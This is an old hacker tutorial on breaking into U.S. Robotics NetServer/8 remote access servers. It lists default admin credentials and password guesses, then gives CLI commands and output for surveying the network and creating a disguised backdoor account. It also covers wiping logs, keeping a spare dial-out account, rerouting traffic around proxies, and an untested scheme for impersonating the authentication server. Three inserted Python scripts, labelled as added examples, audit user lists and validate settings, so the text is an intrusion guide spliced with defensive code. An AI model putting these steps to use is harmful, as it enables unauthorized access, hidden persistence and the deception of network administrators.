
US Robotics NetServer/8 Hacking

U.S. Robotics NetServer/8
by hybrid (hybrid@dtmf.org)

Welcome to my brief article explaining the different commands etc. on the U.S.
Robotics NetServers, which are becoming increasingly popular. These servers
are an extreme security risk to any network that uses them for network
management: they essentially give whoever has administrator access _total_
control over the surrounding network. After all, the NetServer is designed
for network management; I'll go into this in detail in a while. So why am I
writing this article? -- Well, I stumbled across a website one night which
featured information on the U.S. Robotics NetServer. The site's content was
basically bragging about the "tough security" of the NetServer; after seeing
this, and once I had managed to stop laughing, I decided to write this file,
for your enjoyment :)

So let's take a look at the NetServer. You are likely to stumble across this
type of system either by means of a dialup modem, or by IP (telnet etc.).
The NetServer will identify itself like this:

Welcome to USRobotics
 The Intelligent Choice in Information Access

Note: in most cases admins have made an 'intelligent' choice in choosing this
server for their networks, but when it comes to system security, I would
avoid the phrase 'intelligent' by a mile. The NetServer, like most OSs/
net management systems, comes with a nice set of factory default logins, which
in most cases will give whoever has these logins super-user access to the
network. Hmm, ok (that's _real_ security - well done USRobotics). When logging
in, the following default accounts will usually get you in:

Username        Password        Access
----            --------        ------------
admin           admin           god
default         default         enough to get god access
.......         ........        ........................
manager         manager         god                 } I've only ever seen
guest           guest           not good enough       these a few times.

The access that I am going to focus on with this file is the admin access.
The admin account will nearly always exist, so try variations of the
password, you know, the usual shit:

admin   manager
admin   <no pass>      } on some systems I have noticed that finger port
admin   administrator    (79) is open, and will list a surprising amount of
admin   root             info about the admin, ie: last name, location etc,
admin   manage           this would maybe be to your advantage when guessing.

Okay then, you got in. You'll be confronted with something a little like this:

NetServer:             } the command line shell. You have several choices,
                         including <help> or <?>.

Right, here are the choices.

CONNECT                  LOGOUT                   TELNET
EXIT                     MANAGE
HELP                     RLOGIN

Very self explanatory, but there are a few things you need to know. To begin
with, the NetServer uses different keys to edit. Command Line Edit: the
following options are available:
^a  - start of command   ^b    - left 1 char      ^d - delete char
^e  - end of command     ^f    - right 1 char     ^n -  next command
^p  - prev command       ESCb  - left 1 word       ESCf - right 1 word
<-  - left 1 char        ->    - right 1 char
up arrow - prev command  down arrow  -  next command

The main option you are interested in from the above menu is the MANAGE
command. Once you have entered the manage session you will be confronted with
the following command line prompt:

manage: or session: (user definable). Hit <?> and you will get the following:
ADD                      HANGUP                   RENAME
ARP                      HELP                     RESET
ASSIGN                   HIDE                     RESOLVE
BYE                      HISTORY                  RLOGIN
COPY                     KILL                     SAVE
DELETE                   LEAVE                    SET
DIAL                     LIST                     SHOW
DISABLE                  LOGOUT                   TELNET
DO                       PING                     UNASSIGN
ECHO                     QUIT                     VERIFY
ENABLE                   REBOOT
EXIT                     RECONFIGURE

Nice huh? :) Right, now I'm going to go into each command in detail, right
from <add> to <verify> and all the sub-commands.


APPLETALK                IP                       SNMP
DNS                      IPX                      SYSLOG
FILTER                   LOGIN_HOST               TFTP
FRAMED_ROUTE             MODEM_GROUP              USER

The add command is used to upgrade, or add to, the current network from which
the NetServer is hosted. For example, you can update DNS server
configurations/routes/IP designation etc., as well as link other networks to
work in synchrony with each other. The commands are very self explanatory, and
will offer help as you go along. A note though: on most systems the log file
will begin logging everything if it notices a sudden rise in command line
activity. This is not for security reasons, but more for administration
debugging; you can alter this if you like, or wipe the log file altogether,
more on that in a bit.

When updating/or adding network configurations, the IP formating for the
netserver is as follows:
This field is a IP Host Name or an IP Network Address
The expected format is Station_Address{/Mask_Specifier}
The expected format for the address is a.b.c.d
Each value must be in the range of 0 to 255 decimal.
The address 127.x.x.x is reserved for Loopback and cannot be specified.
The Mask Specifier can be in ip address format
in which case it must be or greater and contiguous
or 'A', 'B', or 'C'
or a numeric value from 8 to 30
describing the number of one bits in the mask
If this is being used to set a User's IP Address
The Mask Specifier can also be 'H' (for Host)
or a numeric value to 32
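The address/mask rules in that help text are easy to get wrong when reviewing a configuration dump, so here is a checker that encodes them; it is an added example, not code from the page or from USRobotics. The help text's minimum for a dotted-decimal mask is missing from the extract above, so the checker assumes the same lower bound of 8 one-bits that the numeric form requires.

```python
import re

# Station_Address{/Mask_Specifier} checker for the NetServer's IP field rules.
# Added example; the rules come from the CLI help text quoted above, except the
# minimum dotted-decimal mask, which is missing from the page and is assumed
# here to be the same 8 one-bits that the numeric form requires.

DOTTED = re.compile(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$")
CLASS_MASKS = {"A": 8, "B": 16, "C": 24}   # classful letters -> prefix length
MIN_ONES = 8                                # assumed lower bound (see above)


def _octets(text):
    """Split a.b.c.d into four ints, each checked to lie in 0..255."""
    m = DOTTED.match(text)
    if not m:
        raise ValueError(f"expected a.b.c.d, got {text!r}")
    vals = [int(g) for g in m.groups()]
    if any(v > 255 for v in vals):
        raise ValueError(f"octet out of range 0-255 in {text!r}")
    return vals


def _ones_in_contiguous_mask(mask):
    """Return the prefix length of a dotted mask, rejecting non-contiguous ones."""
    bits = 0
    for v in _octets(mask):
        bits = (bits << 8) | v
    ones = bin(bits).count("1")
    # A contiguous mask is exactly `ones` leading 1-bits followed by 0-bits.
    if bits != (0xFFFFFFFF << (32 - ones)) & 0xFFFFFFFF:
        raise ValueError(f"mask bits are not contiguous: {mask!r}")
    return ones


def parse_ip_spec(spec, user_address=False):
    """Validate a NetServer IP specifier and return (address, prefix_len).

    prefix_len is None when no mask specifier was given.  user_address=True
    applies the extra rules for a user's IP address ('H' and /31, /32).
    """
    addr, _, mask = spec.partition("/")
    if _octets(addr)[0] == 127:
        raise ValueError("127.x.x.x is reserved for loopback and cannot be specified")
    if not mask:
        return addr, None
    max_ones = 32 if user_address else 30
    if mask in CLASS_MASKS:
        return addr, CLASS_MASKS[mask]
    if mask == "H":
        if not user_address:
            raise ValueError("'H' is only valid when setting a user's IP address")
        return addr, 32
    if mask.isdigit():
        ones = int(mask)
    elif DOTTED.match(mask):
        ones = _ones_in_contiguous_mask(mask)
    else:
        raise ValueError(f"unrecognised mask specifier {mask!r}")
    if not MIN_ONES <= ones <= max_ones:
        raise ValueError(f"mask length {ones} outside {MIN_ONES}..{max_ones}")
    return addr, ones


def is_valid_ip_spec(spec, user_address=False):
    """True if the specifier passes all the rules, False otherwise."""
    try:
        parse_ip_spec(spec, user_address)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for s in ("10.1.2.3/24", "10.1.2.3/C", "10.1.2.3/255.255.0.0",
              "127.0.0.1/A", "10.1.2.3/255.0.255.0", "10.1.2.3/H"):
        print(f"{s:24} {'ok' if is_valid_ip_spec(s) else 'rejected'}")
```

The loopback interface's own 127.0.0.1/A does appear in the show configuration output further down, but as the help text says it cannot be entered by hand, so the checker rejects it.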

But before we go and do anything crazy, take a look at the current system
configuration/setup. Here are the options; turn ASCII logging on for future
reference (don't be dumb, 3DES ;) ..

CLI - Missing Required Argument(s):

This field is a KEYWORD. The possible values are:
AARP                     FILTERS                  PROCESSES
ACTIVE                   INIT_SCRIPTS             SERVICES
APPLETALK                INTERFACES               SNMP
AVAILABLE                IP                       SWITCHED
CONNECTIONS              IPX                      SYSLOGS
CRITICAL                 LAN                      TCP
DIAL_OUT                 LOGIN_HOSTS              TFTP
DNS                      MODEM_GROUPS             UDP
FACILITIES               NETWORKS                 USERS
FILES                    PPP
This field is a KEYWORD. The possible values are:
ACCOUNTING               DNS                      NETWORK
APPLETALK                EVENTS                   PPP
AUTHENTICATION           FILE                     SECURITY_OPTION
CLEARTCP                 FILTER                   SNMP
COMMAND                  ICMP                     SYSTEM
CONFIGURATION            IMODEM                   TCP
CONNECTION               INTERFACE                TELNET
CRITICAL_EVENT           IP                       TIME
DATE                     IPX                      UDP
DDP                      MEMORY                   USER
DIAL_OUT                 MODEM_GROUP

As you can see, there are plenty of commands at your disposal. First, it's
always a good idea to check who else is on the system/server, so we use the
list connections command; it should look a little like this:

session:list connections<enter>

IfName    User Name                       Type         DLL
mod:1     shitface                        DIAL_IN      PPP
mod:3     admin                           DIAL_IN      NONE <-- you

The NetServer will also have dialout commands, but that is only using the
server for something lame; its full potential is in the IP routing. To check
whether dialout is enabled anyway, just use the <list dialout> command,
which will tell you what serial pools the modems are connected to. OK then,
now we are going to focus on configuring an account for ourselves, and
blending into the user list with stealth. Beforehand though, you need as
much information on the system as possible. So here we go.

session:list dns servers<enter>

Preference Name                           Address         Status
1                                ACTIVE

To gather IP addressing/routing information we can use the following:
session:list ip<enter>
CLI - Missing Required Argument(s):
This field is a KEYWORD. The possible values are:
ARP                      NETWORKS

session:list ip addresses<enter>

                   Bcast Reassembly
Address            Algo  Max Size Interface
                   1     3468     loopback
                   1     3468     eth:1
session:list ip arp<enter>

IP Address      Phys Address      Type    IfName
                00:87:3i:28:24:40 Dynamic eth:1
                00:27:ah:01:4f:60 Dynamic eth:1
session:list ip interface_block<enter>


Address            Neighbor        Status   Interface
                                   ENABLED  mod:1
                                   ENABLED  eth:1
session:list ip networks<enter>

Name                            Prot Int      State Type Network Address
ip                              IP   eth:1    ENA   STAT
IP-loopback                     IP   loopback ENA   AUTO
2608159-ip-I3                   IP   mod:1    ENA   DYN
session:list ip routes<enter>

Destination        Prot   NextHop         Metric  Interface
                   NetMgr                 1       eth:1
                   LOCAL                  1       loopback
                   LOCAL                  1       loopback
                   LOCAL                  1       loopback
                   LOCAL                  1       eth:1
                   LOCAL                  1       eth:1
                   LOCAL                  1       mod:1
                   LOCAL                  1       eth:1
                   LOCAL                  1       eth:1
session:list tcp connections<enter>

Local Address     Local Port  Remote Address    Remote Port Status
                  23                            0           Listen
                  139                           0           Listen
                  5000                          0           Listen
session:list tftp clients<enter>

session:list udp listeners<enter>

Local Address     Port
                  69
                  161
                  520
                  1645
                  2049
                  2050
                  3000

To get a complete system configuration use the <show config> command:

session:show configuration<enter>

System Identification:
     Name: RAS_Sam     Contact: hybrid

Authentication  Remote: ENABLED       Local: ENABLED
    Primary Server:    Secondary Server:

Remote Accounting: ENABLED
    Primary Server:    Secondary Server:

     mod:1                    mod:2                    mod:3
     mod:4                    mod:5                    mod:6
     mod:7                    mod:8

IP  Forwarding: ENABLED       Routing: ENABLED       RIP: ENABLED
    Dynamic Pool Beginning Address:    Size: 8
        ip                              ETHERNET_II  eth:1
        IP-loopback                     LOOPBACK     loopback127.0.0.1/A

IPX  Default Gateway: 00000000            Maximum Hops: 15
    Dynamic Pool Beginning Address: 00000000            Members: 0

Appletalk  ARAP: ON      Maximum ARAP Sessions: 8

PPP  Receive Authentication: PAP

DNS  Domain: uber.coffee.co.uk
session:show dns<enter>

Domain Name:                               uber.coffee.co.uk
Number Retries per Server:                 1
Timeout Period in Seconds:                 5

Now that's enough information about the NetServer for the time being. There
is also a wealth of other commands for listing IP configurations, but those
are the more important ones. The next set of commands list and show
information about the NetServer's files/architecture:

session:list files<enter>
DNS.cfg                  } the DNS configuration
EventHandler.cfg         you can view the contents of a file by 
FilterMgr.cfg            using the <show file [file]> command, 
IPForwarder.cfg          this will only show the contents of a
IpxProcess.cfg           file if it is in raw ascii. 

OK, now I'm sure you are fed up with reading what commands the NetServer has;
it's time to take a look at what it can do, and _how_ you can do it. To begin
with you need your own account, not just any account though, you need an
account that will blend in with the others. Now here is the interesting part:
when you configure an account, you can specify a set IP for the user you add;
you can then (using your own box and DNS server) set up your own sub-domains,
but the cool thing is.. you can configure this all on the NetServer.

The NetServer has some very advanced options when setting up accounts: you
can specify that your IP statistics/routing etc. are cloaked and even
spoofed (internally). If you are configuring an account on a net connected
NetServer, you will be online, and not even exist (you are behind a multi-
layer firewall, and your IP is non-existent).

First things first, it's a good idea to get a listing of the current users on
the network so we can make an account that will blend in with the others, and
not stick out too much. For this, use the <list users> command.
session:list users<enter>
                                Login       Network
User Name                       Service     Service    Status   Type
admin                           TELNET  (D) PPP    (D) ACTIVE   LOGIN
shitface                        TELNET  (D) PPP        INACTIVE NETWORK
default                         TELNET      PPP        INACTIVE NETWORK
1233333                         TELNET      PPP        INACTIVE NETWORK
1207706                         TELNET      PPP        INACTIVE NETWORK
1304708                         TELNET      PPP        INACTIVE NETWORK

As you can see the higher ratio of users have a numerical username, therefore
when it comes to configuring our own account, we will have a numerical user-
name as well -- common sense really. Did you notice that the user 'shitface'
had a PPP dialin connection before? (show connections).. Well, the user
shitface will have the correct IP/network configurations in order to
establish a PPP connection. So we need to get more information on the user
shitface. Use the command <show user [username]>

session:show user shitface<enter>

Status:                                    INACTIVE
Type:                                      NETWORK
Expiration:                                00-   -0000
Callback Type:                             NORMAL
Phone Number:                              1-800-SCAN-4IT
Alternate Phone Number:                    1-800-OPERATOR
Input Filter:
Output Filter:
Modem Group:                               all
Session Timeout                            0
Idle Timeout:                              0
Network Service                            PPP
Header Compression:                        TCPIP        (D)
MTU:                                       1500
Send Password:
Appletalk:                                 ENABLED      (D)
Appletalk Address Range:                   0 - 0
Filter Zones                               ENABLED      (D)
IP Usage:                                  ENABLED
Address Selection:                         ASSIGN
Remote IP Address:                   (D)
IP Routing:                                NONE
Default Route Option:                      DISABLED
IP RIP Routing Protocol:                   RIPV1
IP RIP Routing Policies:
IP RIP Authentication Key:
IPX Usage:                                 ENABLED   (D)
IPX Address:                               0
IPX Routing:                               RESPOND   (D)
IPX WAN Usage:                             DISABLED  (D)
Spoofing:                                  ENABLED
Max Channels                               1         (D)
Channel Decrement Percent:                 20        (D)
Channel Expansion Percent:                 60        (D)
Expansion Algorithm:                       LINEAR    (D)
Receive ACC Map:                           0         (D)
Transmit ACC Map:                          0         (D)
Compression Algorithm:                     AUTO      (D)
Compression Reset Mode:                    AUTO      (D)
Min Compression Size:                      256       (D)

Now we are going to configure an account for ourselves -- this is necessary
so we can establish a good PPP connection and blend in with the other users
on the network. We can then use the tools on our own box for mapping
the internal network, or the darkcyde of the firewall; we can then find all
the other connected boxes on the network.

So, when we configure our network account we need to consider the following:
IP usage, routing, DNS servers, cloaking, spoofing, _stealth_. On a net
connected NetServer you can often use your own specified DNS server, but
the network traffic in the ARP tables etc. will reveal abnormal network
activity to a nosey administrator. The best thing to do is use the server's
internal DNS server; you can later own the DNS server as well :> Also, if the
network is firewalled (which will always be the case), external use of a DNS
server would arouse the suspicions of the administrator(s).

The default setting for PPP access on NetServers is standard PPP protocol;
sometimes the administrator will have enabled CHAP or PAP for login
authentication, and this will usually be authenticated by another box on
the network, therefore you are pretty screwed unless you a) own the
authentication server or b) set up your account for standard PPP login
authentication. -- the only disadvantage with this would be that the
account you created would stick out from the others a little more.

Right, time to make the account. In this case, because the majority of
account names in the user list are numerical we will create a numerical
account, yep you guessed it, we will create an account called '31337'...

session:add user.... 
CLI - Missing Required Argument(s):
This field is a User Name
        The expected format is an ASCII string.      } options
        The maximum size is 32 characters
        This name must be unique.
ENABLED                  NETWORK_SERVICE          TYPE

You can specify what kind of service you are going to add for yourself; just
keep it to PPP and telnet for the time being, that's what the other users
have, so that's what we'll have. Different options for type of service:

        The types CALLBACK and DIAL_OUT are mutually exclusive.

So now we are ready to add our user.. The command line is as follows:
session:add user <31337> login_service telnet password <password>

Now to check that the user 31337 was added ok, check the user list
with the <list users> command:
31337                         TELNET      PPP    (D) INACTIVE NETWORK(D)

Right, we've got the username there, now we have to activate our capabilities
on the network. For this we use the <set> command.

session:set user 31337
CLI - Missing Required Argument(s):

This field is a KEYWORD. The possible values are:
CALLBACK_TYPE            MODEM_GROUP              TYPE
INPUT_FILTER             PHONE_NUMBER             } If you are super el8
                                                    you can add a phone
                                                    number in your userfile.

Now, this is optional, and not advisable, but if you want to set your own
IP address (good for subnetting) you can configure your account as follows.
I think I have also done this so your IP activities are not logged in the
ARP cache.
session:add framed_route user 31337 ip_route (numerical IP address goes here)

We also need to enable the user; the command should be something like this:

session:set user 31337 type network
session:set user 31337 type telnet
session:set user 31337 type ppp
session:set user 31337 type login

Now we have our user set up, it's time to test it out. Log out of the system
(<exit>), reset modems, then dial back in. This time log in as 31337 with your
chosen password, which by the way for some reason has to be the same length
as the user account name. Once logged in you should get an automatic PPP
connection.. enable your PPP client with the internally specified DNS server,
default routes etc., and there you go.
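Seen from the admin's side, the row this procedure leaves in <list users> is the tell: the new account's network service and type carry (D) markers that every other account on the page has set explicitly, and the factory accounts (admin, default, manager, guest) are still present. The audit script below is an added example, not code from the page; it takes the page's own <list users> rows as its sample input and assumes that (D) marks a value left at its default.

```python
from collections import Counter

# Added example: audit a NetServer "list users" listing.  The sample rows are
# the ones shown on the page (with the 31337 row the add-user step produced).
SAMPLE_LIST_USERS = """\
                                Login       Network
User Name                       Service     Service    Status   Type
admin                           TELNET  (D) PPP    (D) ACTIVE   LOGIN
shitface                        TELNET  (D) PPP        INACTIVE NETWORK
default                         TELNET      PPP        INACTIVE NETWORK
1233333                         TELNET      PPP        INACTIVE NETWORK
1207706                         TELNET      PPP        INACTIVE NETWORK
1304708                         TELNET      PPP        INACTIVE NETWORK
31337                           TELNET      PPP    (D) INACTIVE NETWORK(D)
"""

# Factory accounts named on the page; their presence alone is worth a finding.
FACTORY_ACCOUNTS = {"admin", "default", "manager", "guest"}
FIELDS = ("login_service", "network_service", "status", "type")


def parse_list_users(text):
    """Return {name: {field: (value, is_default)}} from a list users dump.

    A "(D)" token (or suffix, as in NETWORK(D)) is assumed to flag a value
    that was left at its default rather than set explicitly.
    """
    users = {}
    for line in text.splitlines():
        tokens = line.split()
        if not tokens or tokens[0] in ("User", "Login"):
            continue                      # blank or header lines
        name, values = tokens[0], []
        for tok in tokens[1:]:
            if tok == "(D)":
                values[-1] = (values[-1][0], True)
            elif tok.endswith("(D)"):
                values.append((tok[:-3], True))
            else:
                values.append((tok, False))
        if len(values) != len(FIELDS):
            raise ValueError(f"unexpected row layout: {line!r}")
        users[name] = dict(zip(FIELDS, values))
    return users


def audit_users(users):
    """Flag factory accounts and accounts whose (D) profile is unusual.

    The "profile" is which fields carry (D).  The most common profile among
    all accounts is taken as the baseline; anything else gets listed, since an
    account whose defaults differ from its peers was created differently.
    """
    findings = []
    for name in sorted(users):
        if name in FACTORY_ACCOUNTS:
            findings.append((name, "factory account still present"))
    profile = {n: tuple(f for f in FIELDS if u[f][1]) for n, u in users.items()}
    baseline, _ = Counter(profile.values()).most_common(1)[0]
    for name, prof in profile.items():
        if prof != baseline:
            findings.append((name, f"default markers on {list(prof)} "
                                   f"(peers: {list(baseline)})"))
    return findings


if __name__ == "__main__":
    for name, why in audit_users(parse_list_users(SAMPLE_LIST_USERS)):
        print(f"{name:10} {why}")
```

On the page's rows the baseline profile is "no (D) at all", so admin, shitface and 31337 are all listed for review alongside the two factory accounts.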

Test the DNS server by pinging/telnetting whatever to a few host[names]. You
now have a secure PPP connection to your host (the USRobotics NetServer). You
can now begin to take a look at what is on the internal network. It is
preferable to use a port scanner such as nmap or similar; you will be
surprised at the boxes you will find connected to the network, as in most
internal networks you will find SunOS/Solaris boxes, UNIX boxes (the
NetServer is based on unix -- but I forgot to mention that), you will also
find cisco routers/switches, jet-directs, printers, everything you would
expect to find on an internal LAN network.

Now we've established our net connection, it's time to take a look at the
further things you can do with the NetServer system. If the network has a
nice amount of modems in the modem serial pool (you can see this in the
show commands) we can configure our account for dialout as well. This can be
done by using the <set user> commands. The best thing to do here is set up a
separate account for dialout only, therefore if the admin notices that
account you won't lose your access altogether. Once you have set up your
separate account with login_user and dial_out settings, you can then telnet
back to the NetServer (IP obtained via scan --- or the command show system).
Once telnetted back to the NetServer you can login with your dialout account
user name, and then attach to the modem pool and control the modems just as
you would in a terminal screen, AT etc. You can then dialout whilst you are
simultaneously online as well.

As in most OSs, the NetServer system operates on a multi-user security access
level basis. There are different levels of access, for example:

        admin   --- super-user
        manager --- manager
        user123 --- standard user
        guest   --- guest access
        default --- default settings

To look at this in more detail, here are the settings for the admin account
and also the settings for the default accounts:

session:show user admin<enter>

Status:                                    ACTIVE
Type:                                      LOGIN
Expiration:                                00-   -0000
Callback Type:                             NORMAL
Phone Number:
Alternate Phone Number:
Input Filter:
Output Filter:
Modem Group:                               all    (D)
Session Timeout                            0
Idle Timeout:                              0
Login Service:                             TELNET  (D)
TCP Port:                                  23    (D)
Terminal:                                  vt100    (D)
Login Host:                      
Host Type:                                 SELECT
session:show user default<enter>

Status:                                    INACTIVE
Type:                                      NETWORK
Expiration:                                00-   -0000
Callback Type:                             NORMAL
Phone Number:
Alternate Phone Number:
Input Filter:
Output Filter:
Modem Group:                               all
Session Timeout                            0
Idle Timeout:                              0
Network Service                            PPP
Header Compression:                        TCPIP
MTU:                                       1514
Send Password:
Appletalk:                                 ENABLED
Appletalk Address Range:                   0 - 0
Filter Zones                               ENABLED
IP Usage:                                  ENABLED
Address Selection:                         ASSIGN
Remote IP Address:               
IP Routing:                                NONE
Default Route Option:                      DISABLED
IP RIP Routing Protocol:                   RIPV1
IP RIP Routing Policies:
IP RIP Authentication Key:
IPX Usage:                                 ENABLED
IPX Address:                               0
IPX Routing:                               RESPOND
IPX WAN Usage:                             DISABLED
Spoofing:                                  DISABLED
Max Channels                               1
Channel Decrement Percent:                 20
Channel Expansion Percent:                 60
Expansion Algorithm:                       LINEAR
Receive ACC Map:                           0
Transmit ACC Map:                          0
Compression Algorithm:                     AUTO
Compression Reset Mode:                    AUTO
Min Compression Size:                      256
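Putting a user's dump next to the default template is how an admin would spot what that account's settings were changed to: the values that differ from the template (on the shitface account above, the phone numbers, the MTU and Spoofing) are exactly the ones worth asking about. The script below is an added example, not code from the page; it parses the Key: value (D) layout of <show user> and reports the differences, using shortened excerpts of the page's two dumps as sample input, and assumes (D) marks a value left at its default.

```python
import re

# Added example: diff one account's "show user" dump against the default
# template's.  Excerpts of the page's own dumps serve as sample input.
SHOW_USER_SHITFACE = """\
Status:                                    INACTIVE
Type:                                      NETWORK
Phone Number:                              1-800-SCAN-4IT
Alternate Phone Number:                    1-800-OPERATOR
Input Filter:
Modem Group:                               all
Session Timeout                            0
Network Service                            PPP
Header Compression:                        TCPIP        (D)
MTU:                                       1500
Remote IP Address:                   (D)
Spoofing:                                  ENABLED
Max Channels                               1         (D)
"""

SHOW_USER_DEFAULT = """\
Status:                                    INACTIVE
Type:                                      NETWORK
Phone Number:
Alternate Phone Number:
Input Filter:
Modem Group:                               all
Session Timeout                            0
Network Service                            PPP
Header Compression:                        TCPIP
MTU:                                       1514
Remote IP Address:
Spoofing:                                  DISABLED
Max Channels                               1
"""

# key, optional colon, 2+ spaces, value, optional "(D)" default marker
LINE = re.compile(r"^(?P<key>.*?):?\s{2,}(?P<value>.*?)\s*(?P<dflt>\(D\))?\s*$")


def parse_show_user(text):
    """Return {key: (value, is_default)} for one show user dump."""
    settings = {}
    for raw in text.splitlines():
        if not raw.strip():
            continue
        m = LINE.match(raw)
        if m:
            key, value, dflt = m.group("key"), m.group("value"), bool(m.group("dflt"))
        else:                       # "Input Filter:" with nothing after it
            key, value, dflt = raw.strip().rstrip(":"), "", False
        settings[key.strip()] = (value, dflt)
    return settings


def diff_against_default(user, default):
    """List (key, user_value, default_value) where the values differ.

    Keys missing on one side are reported with None for the absent value.
    """
    out = []
    for key in sorted(set(user) | set(default)):
        uval = user[key][0] if key in user else None
        dval = default[key][0] if key in default else None
        if uval != dval:
            out.append((key, uval, dval))
    return out


if __name__ == "__main__":
    for key, uval, dval in diff_against_default(
            parse_show_user(SHOW_USER_SHITFACE), parse_show_user(SHOW_USER_DEFAULT)):
        print(f"{key:28} user={uval!r:20} default={dval!r}")
```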

You can also see what is going on on the NetServer at the time you are on it
by issuing the following command:

session:list processes<enter>

Index     Name                     Type           Status
2001      NameManager              System         Inactive
12001     Console                  System         Inactive
22001     FileManager              System         Inactive
32001     Configurator             Application    Inactive
42001     Main                     Application    Active
52001     MIB Registrar            Application    Inactive
62001     Config File Manager      Application    Inactive
72001     IP Forwarder             Forwarder      Inactive
82001     UDP Process              Application    Inactive
92001     TCP Process              Application    Inactive
a2001     Telnet                   Application    Inactive
b2001     SLIP Process             Application    Inactive
c2001     TFTP Process c2001       Application    Inactive
d2001     IP Spoofing              Application    Inactive
e2001     Proxy NetBIOS            Application    Inactive
f2001     RoboExec NetManagement   Application    Active
102001    User Manager             Application    Inactive
112001    SNMP Agent               Application    Inactive
122001    Event Handler            Application    Inactive
132001    Point to Point Protocol  Application    Inactive
142001    Domain Name System       Application    Inactive
152001    Filter Manager Process   Application    Inactive
162001    IPX                      Forwarder      Inactive
172001    IPX RIP                  Application    Inactive
182001    SAP                      Application    Inactive
192001    IPX DIAG                 Application    Inactive
1a2001    IPX NETBIOS              Application    Inactive
1b2001    IPX SPOOF                Application    Inactive
1c2001    IPX WAN                  Application    Inactive
1d2001    AppleTalk Forwarder      Forwarder      Inactive
1e2001    AppleTalk NBP/ZIP        Application    Inactive
1f2001    AppleTalk Spoofer        Application    Inactive
202001    AppleTalk RTMP           Application    Inactive
212001    AppleTalk ARAP Framing   Application    Inactive
222001    IPX/IP Dial-out Process  Application    Inactive
232001    File System Compaction ProcessApplication    Inactive
242001    Console Driver           Driver         Inactive
252001    Loopback Driver          Driver         Inactive
262001    Ethernet Driver          Driver         Inactive
272001    Modem Port Driver        Driver         Inactive
282001    Call Init Process        Application    Inactive
292001    IP Routing Instance      Application    Inactive
2a2001    CLI                      Application    Inactive
2b2004    CLI 2b2004               Application    Inactive

The commands on the shell interface are fairly self explanatory and all
offer a limited amount of info in help topics. It appears that on some
NetServers, where server authentication is enabled, if an account is set
up, the username and login details are automatically transferred to the
authentication server, so any other box on that network connected to the
authentication server will allow you to login with the username you set
up on the NetServer, a nice big security hole for the admins to ponder over.

There are a few obstacles that you may have to overcome if you find such a
server, for example: most NetServers are hidden nicely behind firewalls, as
well as outgoing packets being sent through proxy servers. Again, you have
options here, you could a) attempt to get admin on the proxy servers and the
routers, or b) -- the more favourable option would be to re-configure your
IP routing in the network setup configuration on the NetServer. This means
you would bypass any proxy/security servers that are present on that network.

An idea I had a while back when dealing with authentication servers is to
find the local authentication server on the network, and mirror the
software/OS etc. that the authentication server uses. Let's say the
authentication server was (after you have replicated the
server) -- first temporarily take the server offline in the IP routing
configuration, then configure a user account with the fixed IP of (the authentication server).. login as that user when you are
on the box you set up with the authentication software; the idea is that
all authentication packets will be sent to your box, effectively making you
(the host) the authentication server. It's just an idea anyhow, I've never
tried it out, but I'm sure something like that would work.

Anyhow, that's it for this article, I hope you enjoyed it. Take it easy and
remember to visit my website :) --- hybrid.

                        --- http://hybrid.dtmf.org ---

shouts fly out to: [ D4RKCYDE ] [ B4B0 ] [ 9X ] [ PHUNC ] [ DTMF ] [ MED ]
                   [ zomba ] [ downtime ] [ jasun ] [ substance ] [ tip ]
                   [ gb ] [ ph1x ] [ jorge ] [ lowtek ] [ wirepair ]
                   [ psyclone ] [ oeb ] [ siezer ] [ infidel ] [ knight ]




                    ___ ___ _____.___.____________________  ____________
hybrid@b4b0.org    /   |   \\__  |   |\______   \______   \/_   \______ \
hybrid@ninex.com  /    ~    \/   |   | |    |  _/|       _/ |   ||    |  \
hybrid.dtmf.org   \    Y    /\____   | |    |   \|    |   \ |   ||    `   \
----------------   \___|_  / / ______| |______  /|____|_  / |___/_______  /
                         \/  \/               \/        \/              \/
